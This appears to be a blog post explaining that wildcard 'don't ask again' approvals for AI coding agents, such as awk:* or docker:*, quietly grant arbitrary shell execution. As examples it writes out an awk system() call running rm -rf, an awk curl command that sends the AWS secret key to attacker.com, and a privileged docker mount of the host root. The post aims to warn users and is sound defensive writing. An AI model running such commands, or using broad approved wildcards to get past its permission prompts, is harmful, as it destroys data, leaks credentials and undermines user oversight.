You are debugging a CSV parsing issue. Your AI coding agent wants to count the fields in a header row. It shows you this command:
awk -F, 'NR==1{print NF" fields in header"}' data.csv
The agent asks for permission. You see three options:
- Yes
- Yes, and don’t ask again for:
awk:* - No
You know awk as a tool for processing structured data. At first glance this looks innocuous, and option 2 is right there: approve awk and stop being interrupted.
You click option 2.
You just granted your AI agent unrestricted shell execution. Not awk execution, shell execution, because awk is not a text formatter. It is a programming language with a system() function, and awk:* covers every program that language can express.
What awk:* actually permits#
awk has a built-in function called system() that executes arbitrary shell commands and returns the exit code. This is not a hidden feature. It is documented, standard POSIX, and supported by every awk implementation on every Unix system.
awk '{print NF}' file.csv counts fields. Safe. But awk '{system("rm -rf " $1)}' file.csv deletes whatever is listed in the first column, and awk 'BEGIN{system("curl -s https://attacker.com/exfil?key=" ENVIRON["AWS_SECRET_ACCESS_KEY"])}' reads your AWS secret key from the environment and sends it to an external server. No file argument needed, because the ENVIRON array exposes every environment variable in the process.
All three are awk commands. All three match the awk:* wildcard that was offered alongside a command that counts CSV columns.
awk is not special#
awk is the example, but it is not the exception. docker:* covers docker run --privileged -v /:/host alpine sh. Full host access. The prompt that triggered the wildcard was probably docker ps.
The wildcard pattern command:* treats the command name as a trust boundary. For any command with embedded execution, the command name tells you nothing about what the command will do.
The real question#
The next time an AI agent asks you to approve a command, look at the “don’t ask again” option. Read the wildcard and consider the worst thing that command name could execute.
If the answer is “I don’t know,” you have your answer. Click option 1.
But you should not have to know. And right now, you do.